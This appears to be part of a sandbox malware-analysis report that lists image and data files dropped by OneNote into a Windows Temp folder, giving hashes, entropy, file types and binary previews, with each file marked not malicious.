SHA-256:	24A9985F05D116ECECAE27408EDC46EA52CA92C133AF53FC09FD34FBC3556A91
SHA-512:	477C8E5AE52B9CD99A786A4BBC37C62679A5F2DDDFC85C0985373A5F9A14782947ACBF634BBAD2495BE1FA1960DB3711D91D7DAD096621E1CDDBD0AFCFC71A65
Malicious:	false
Preview:	./.C..vL....W"v_..~.T.eM.r.QF.9................?.....I...............................................................................................................h............................................+..)Q\H..m.Z............l.=.X.D......y.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{59A6AFE0-FF25-4B73-AEFE-F0851EFB4A75}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Temp\{5FEDDC1E-D505-4938-8454-D436E6E5EF2D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Temp\{609D7734-9D63-4A02-A6F1-2D1A3EB8E1B2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Temp\{616ABEFD-3B75-4D04-8360-F442DE4276DC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Temp\{65D34C33-26BC-4983-8D6F-C7BDE65F9850}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{697A3135-2519-4F0A-A872-AAD0580F1D71}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{69863C97-F119-4250-B789-224C92162743}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Temp\{6BD58D71-F44F-4751-80D8-BA7F2C612BBB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{6F0B7D1E-57BF-4256-A523-1D3795F6D385}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Temp\{6F732945-CAA9-4569-BFF8-708159A2477F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Temp\{7299E14D-3931-4B4D-9E69-3130515A4C44}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Temp\{72E28A42-9E54-4E91-A581-6AC079457F1E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{784E187E-9F5A-4DFD-8882-2A4103A016C9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Temp\{7A1A2CDE-FB73-405E-B63D-164C29FB7209}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6473739891971751
Encrypted:	false
SSDEEP:	6:RamRZmYyfB3h1RRXUnffYFPi6FFBl/FKD1EDEDRujlw//0lweI/mmE5Rujd:RamRZmYyf9/Uf2pFFBtY125Wf/mmx
MD5:	BEB1CD67CF4BF873866F17905B0955A1
SHA1:	C48E39A904CEB8625735470CE189C40CD17017DA
SHA-256:	2806F7B6C8B74AE3EE6DF9F4E35187AC2D1C89936976E7B64B5BC1CCC00F2F28
SHA-512:	4D7060CD9A36B8B208E4D7E421052E67C21854B0AFC64B1FCBDC84EECD694C2B0A28C67286F2DC25184E2B3FB99F7179D877B1ABADD6304A12B183E2B63E2655
Malicious:	false
Preview:	./.C..vL....W"v_ON.).4A...UmaU.................?.....I...............................................................................................................h..............................................g..OM..3%5.h..........Z.4'&.G...!...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{7A5BFED1-6EEA-42C6-9674-C56A189A4704}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Temp\{7CFD8F71-1902-4AC4-82C1-A49A9E057C29}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Temp\{812D5262-0733-4BD8-87C3-143DCB3E50F0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
